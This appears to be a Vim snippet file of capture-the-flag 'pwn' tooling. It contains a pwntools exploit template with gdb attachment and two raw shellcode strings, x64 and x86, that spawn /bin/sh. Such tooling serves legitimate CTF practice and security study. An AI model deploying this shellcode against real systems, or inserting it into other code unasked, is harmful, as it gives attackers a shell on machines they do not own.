snippet pwn "pwnable"
from pwn import *
import time
import sys


def exploit($1):
	${7:pass}


if __name__ == '__main__':
	context.arch = 'amd64'
	if len(sys.argv) > 1:
		${1:proc} = remote('${2:localhost}', ${3:port})
	else:
		$1 = process('${4:filename}')
		gdb.attach($1, '''
		set follow-fork-mode child
		b *${5:main}+0x${6:00}
		continue
		''')
	exploit($1)
	$1.interactive()
endsnippet


snippet shellcode_x64 "x64 shellcode"
shellcode = "\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05"
endsnippet

snippet shellcode_x86 "x86 shellcode"
\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc2\xb0\x0b\xcd\x80
endsnippet
